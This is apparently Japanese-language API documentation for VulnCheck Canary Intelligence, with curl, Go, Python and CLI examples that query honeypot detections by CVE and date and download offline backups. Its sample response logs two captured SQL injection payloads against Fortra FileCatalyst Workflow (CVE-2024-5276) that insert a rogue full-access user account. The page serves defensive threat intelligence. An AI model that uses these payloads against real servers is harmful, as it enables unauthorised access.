VulnCheck Canary Intelligenceは、インターネット上に実際に脆弱なシステムを展開し、実際の攻撃者の行動と悪用手法を捕捉します。このデータは、どの脆弱性が狙われているのか、どのように悪用されているのか、そして誰が悪用しているのかを明らかにします。防御担当者に早期かつ実用的な情報を提供します。
VulnCheck APIを使えば、VulnCheckエクスプロイト&脆弱性インテリジェンスを簡単に使い始めることができます。まずは、/v3/index/:index?cve=:cve APIを使ってvulncheck-canariesインデックスをクエリするだけです。以下のように実行してください。
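# Query the vulncheck-canaries index for detections tied to CVE-2024-5276.
# The URL is quoted so the shell passes '?' through literally instead of
# treating it as a glob character (zsh aborts on an unmatched glob).
# insert_token_here is a placeholder for your API token; keep the real token
# out of scripts and shell history.
curl --request GET \
  --url 'https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276' \
  --header 'Accept: application/json' \
  --header 'Authorization: Bearer insert_token_here'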
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
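// main queries the vulncheck-canaries index for CVE-2024-5276 and prints the
// returned records to stdout as indented JSON.
func main() {
	// The token comes from the environment so it never has to be written into
	// the source file. Stop early when it is missing instead of sending an
	// unauthenticated request.
	token := os.Getenv("VULNCHECK_API_TOKEN")
	if token == "" {
		log.Fatal("VULNCHECK_API_TOKEN is not set")
	}

	configuration := vulncheck.NewConfiguration()
	configuration.Scheme = "https"
	configuration.Host = "api.vulncheck.com"
	client := vulncheck.NewAPIClient(configuration)

	auth := context.WithValue(
		context.Background(),
		vulncheck.ContextAPIKeys,
		map[string]vulncheck.APIKey{
			"Bearer": {Key: token},
		},
	)

	resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Execute()
	// Report the two failure modes separately: a combined check would log a
	// bare "<nil>" when the call succeeds but the status is not 200.
	if err != nil {
		log.Fatalf("querying vulncheck-canaries: %v", err)
	}
	if httpRes == nil || httpRes.StatusCode != 200 {
		log.Fatalf("querying vulncheck-canaries: unexpected HTTP response %+v", httpRes)
	}

	// The records carry request data captured from attackers (for example the
	// http.url field), so anything consuming this output should treat the
	// field values as untrusted input.
	prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
	if err != nil {
		// log.Fatalf exits the process, so no return is needed after it.
		log.Fatalf("Failed to generate JSON: %v", err)
	}
	fmt.Println(string(prettyJSON))
}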
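import os

import vulncheck_sdk

configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
# Read the API token from the environment rather than hard-coding it, so the
# secret stays out of source control. Raises KeyError when the variable is unset.
configuration.api_key["Bearer"] = os.environ["VULNCHECK_API_TOKEN"]

with vulncheck_sdk.ApiClient(configuration) as api_client:
    indices_client = vulncheck_sdk.IndicesApi(api_client)
    # Query the vulncheck-canaries index for detections tied to CVE-2024-5276.
    api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276")
    # The records contain request data captured from attackers; treat the
    # field values as untrusted if they are passed on to other tooling.
    print(api_response.data)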
# Browse the vulncheck-canaries index for CVE-2024-5276 with the vulncheck command-line tool.
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276
上記の例では、vulncheck-canaries インデックスで CVE-2024-5276 に関する情報を検索します。
有効な CVE 識別子を指定して /v3/index/vulncheck-canaries?cve=:cve API エンドポイントを呼び出すと、次のような応答が返されます。data 配列の各要素は 1 件の検知を表します。http.url などの値は攻撃者が送信したリクエストに由来するため、取り込む側では信頼できない入力として扱ってください。
{
"_benchmark": 0.039542,
"_meta": {
"timestamp": "2025-10-22T11:35:36.982964726Z",
"index": "vulncheck-canaries",
// ...
},
"data": [
{
"src_ip": "34.133.225.171",
"src_port": 58376,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734cm3xr2dqiauaium96hrrzwmbd%27%2C+NULL%2C+%27986347D9E41AEE0835C341ED7DCA8B65%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdFirstName%27%2C+%2734cm3xr2dqiauaium96hrrzwmbdLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734cm3xr2dqiauaium96hrrzwmbd%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:32:24.338Z"
},
{
"src_ip": "34.16.7.161",
"src_port": 48334,
"src_country": "US",
"dst_country": "BR",
"cve": "CVE-2024-5276",
"signature_id": 12700349,
"signature": "VULNCHECK Fortra FileCatalyst Workflow CVE-2024-5276 Exploit Attempt",
"category": "Web Application Attack",
"severity": 1,
"http": {
"url": "/workflow/servlet/pdf_servlet?JOBID=1%27%3BINSERT+INTO+DOCTERA_USERS+%28USERNAME%2C+PASSWORD%2C+ENCPASSWORD%2C+FIRSTNAME%2C+LASTNAME%2C+COMPANY%2C+ADDRESS%2C+ADDRESS2%2C+CITY%2C+STATE%2C+ALTPHONE%2C+ZIP%2C+COUNTRY%2C+PHONE%2C+FAX%2C+EMAIL%2C+LASTLOGIN%2C+CREATION%2C+PREFERREDSERVER%2C+CREDITCARDTYPE%2C+CREDITCARDNUMBER%2C+CREDITCARDEXPIRY%2C+ACCOUNTSTATUS%2C+USERTYPE%2C+COMMENT%2C+ADMIN%2C+SUPERADMIN%2C+ACCEPTEMAIL%2C+ALLOWHOTFOLDER%2C+PROTOCOL%2C+BANDWIDTH%2C+DIRECTORY%2C+SLOWSTARTRATE%2C+USESLOWSTART%2C+SLOWSTARTAGGRESSIONRATE%2C+BLOCKSIZE%2C+UNITSIZE%2C+NUMENCODERS%2C+NUMFTPSTREAMS%2C+ALLOWUSERBANDWIDTHTUNING%2C+EXPIRYDATE%2C+ALLOWTEMPACCOUNTCREATION%2C+OWNERUSERNAME%2C+USERLEVEL%2C+UPLOADMETHOD%2C+PW_CHANGEABLE%2C+PW_CREATIONDATE%2C+PW_DAYSBEFOREEXPIRE%2C+PW_MUSTCHANGE%2C+PW_USEDPASSWORDS%2C+PW_NUMERRORS%29+VALUES%28%2734ckkpr2kyqyslshjzytmsobunu%27%2C+NULL%2C+%277CE0027ED69C7ECA40D38289F18C6036%27%2C+%2734ckkpr2kyqyslshjzytmsobunuFirstName%27%2C+%2734ckkpr2kyqyslshjzytmsobunuLastName%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27202-404-2400%27%2C+%27%27%2C+%2734ckkpr2kyqyslshjzytmsobunu%40mydomain.local%27%2C+1714014839723%2C+1714013661166%2C+%27default%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27full+access%27%2C+%27%27%2C+%27%27%2C+1%2C+0%2C+0%2C+0%2C+%27DEFAULT%27%2C+%270%27%2C+0%2C+%270%27%2C+1%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+%27%27%2C+0%2C+0%2C+0%2C+%27%27%2C+0%2C+%27DEFAULT%27%2C+0%2C+1714014752270%2C+-1%2C+0%2C+NULL%2C+0%29%3B--+-",
"http_user_agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",
"protocol": "HTTP/1.1"
},
"timestamp": "2025-10-17T18:17:55.908Z"
}
]
}
VulnCheck Canary Intelligence は、幅広いユースケースをサポートしています。
2 つの API クエリ パラメータ (cve と date) を組み合わせることで、特定の日付における特定の CVE の悪用状況にすばやく絞り込めます。
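# Query the vulncheck-canaries index for CVE-2024-5276 detections on 2025-10-17.
# The URL must be quoted: an unquoted '&' ends the command and runs it in the
# background, so the date filter and both headers (including Authorization)
# would never reach curl.
# insert_token_here is a placeholder for your API token; keep the real token
# out of scripts and shell history.
curl --request GET \
  --url 'https://api.vulncheck.com/v3/index/vulncheck-canaries?cve=CVE-2024-5276&date=2025-10-17' \
  --header 'Accept: application/json' \
  --header 'Authorization: Bearer insert_token_here'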
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
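// main queries the vulncheck-canaries index for CVE-2024-5276 detections on
// 2025-10-17 and prints the returned records to stdout as indented JSON.
func main() {
	// The token comes from the environment so it never has to be written into
	// the source file. Stop early when it is missing instead of sending an
	// unauthenticated request.
	token := os.Getenv("VULNCHECK_API_TOKEN")
	if token == "" {
		log.Fatal("VULNCHECK_API_TOKEN is not set")
	}

	configuration := vulncheck.NewConfiguration()
	configuration.Scheme = "https"
	configuration.Host = "api.vulncheck.com"
	client := vulncheck.NewAPIClient(configuration)

	auth := context.WithValue(
		context.Background(),
		vulncheck.ContextAPIKeys,
		map[string]vulncheck.APIKey{
			"Bearer": {Key: token},
		},
	)

	// Cve and Date narrow the result to one CVE on one day.
	resp, httpRes, err := client.IndicesAPI.IndexVulncheckCanariesGet(auth).Cve("CVE-2024-5276").Date("2025-10-17").Execute()
	// Report the two failure modes separately: a combined check would log a
	// bare "<nil>" when the call succeeds but the status is not 200.
	if err != nil {
		log.Fatalf("querying vulncheck-canaries: %v", err)
	}
	if httpRes == nil || httpRes.StatusCode != 200 {
		log.Fatalf("querying vulncheck-canaries: unexpected HTTP response %+v", httpRes)
	}

	// The records carry request data captured from attackers (for example the
	// http.url field), so anything consuming this output should treat the
	// field values as untrusted input.
	prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
	if err != nil {
		// log.Fatalf exits the process, so no return is needed after it.
		log.Fatalf("Failed to generate JSON: %v", err)
	}
	fmt.Println(string(prettyJSON))
}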
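import os

import vulncheck_sdk

configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
# Read the API token from the environment rather than hard-coding it, so the
# secret stays out of source control. Raises KeyError when the variable is unset.
configuration.api_key["Bearer"] = os.environ["VULNCHECK_API_TOKEN"]

with vulncheck_sdk.ApiClient(configuration) as api_client:
    indices_client = vulncheck_sdk.IndicesApi(api_client)
    # cve and date together narrow the result to one CVE on one day.
    api_response = indices_client.index_vulncheck_canaries_get(cve="CVE-2024-5276", date="2025-10-17")
    # The records contain request data captured from attackers; treat the
    # field values as untrusted if they are passed on to other tooling.
    print(api_response)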
# Browse the vulncheck-canaries index for CVE-2024-5276, limited to 2025-10-17.
vulncheck index browse vulncheck-canaries --cve CVE-2024-5276 --date 2025-10-17
| オフラインバックアップ | 説明 |
|---|---|
| vulncheck-canaries-3d | Canary Intelligence detections for the past 3 days |
| vulncheck-canaries-10d | Canary Intelligence detections for the past 10 days |
| vulncheck-canaries-30d | Canary Intelligence detections for the past 30 days |
| vulncheck-canaries-90d | Canary Intelligence detections for the past 90 days |
特定のオフライン バックアップを要求するには、次のように /v3/backup/:index を呼び出すだけです (以下に vulncheck-canaries-3d を示します)。
# Request the vulncheck-canaries-3d offline backup from the /v3/backup/:index endpoint.
# insert_token_here is a placeholder for your API token.
curl --request GET \
--url https://api.vulncheck.com/v3/backup/vulncheck-canaries-3d \
--header 'Accept: application/json' \
--header 'Authorization: Bearer insert_token_here'
package main
import (
"context"
"encoding/json"
"fmt"
"log"
"os"
vulncheck "github.com/vulncheck-oss/sdk-go-v2/v2"
)
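// main requests the vulncheck-canaries-3d offline backup and prints the
// response data to stdout as indented JSON.
func main() {
	// The token comes from the environment so it never has to be written into
	// the source file. Stop early when it is missing instead of sending an
	// unauthenticated request.
	token := os.Getenv("VULNCHECK_API_TOKEN")
	if token == "" {
		log.Fatal("VULNCHECK_API_TOKEN is not set")
	}

	configuration := vulncheck.NewConfiguration()
	configuration.Scheme = "https"
	configuration.Host = "api.vulncheck.com"
	client := vulncheck.NewAPIClient(configuration)

	auth := context.WithValue(
		context.Background(),
		vulncheck.ContextAPIKeys,
		map[string]vulncheck.APIKey{
			"Bearer": {Key: token},
		},
	)

	resp, httpRes, err := client.EndpointsAPI.BackupIndexGet(auth, "vulncheck-canaries-3d").Execute()
	// Report the two failure modes separately: a combined check would log a
	// bare "<nil>" when the call succeeds but the status is not 200.
	if err != nil {
		log.Fatalf("requesting vulncheck-canaries-3d backup: %v", err)
	}
	if httpRes == nil || httpRes.StatusCode != 200 {
		log.Fatalf("requesting vulncheck-canaries-3d backup: unexpected HTTP response %+v", httpRes)
	}

	prettyJSON, err := json.MarshalIndent(resp.Data, "", " ")
	if err != nil {
		// log.Fatalf exits the process, so no return is needed after it.
		log.Fatalf("Failed to generate JSON: %v", err)
	}
	fmt.Println(string(prettyJSON))
}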
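import os

import vulncheck_sdk

configuration = vulncheck_sdk.Configuration(host="https://api.vulncheck.com/v3")
# Read the API token from the environment rather than hard-coding it, so the
# secret stays out of source control. Raises KeyError when the variable is unset.
configuration.api_key["Bearer"] = os.environ["VULNCHECK_API_TOKEN"]

with vulncheck_sdk.ApiClient(configuration) as api_client:
    endpoints_client = vulncheck_sdk.EndpointsApi(api_client)
    # Request the vulncheck-canaries-3d offline backup.
    api_response = endpoints_client.backup_index_get("vulncheck-canaries-3d")
    backups = api_response.data
    # Guard the [0] lookup so an empty result gives a clear message instead of
    # an IndexError.
    if not backups:
        raise SystemExit("no backup returned for vulncheck-canaries-3d")
    print(backups[0].url)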
# Download the vulncheck-canaries-3d offline backup with the vulncheck command-line tool.
vulncheck backup download vulncheck-canaries-3d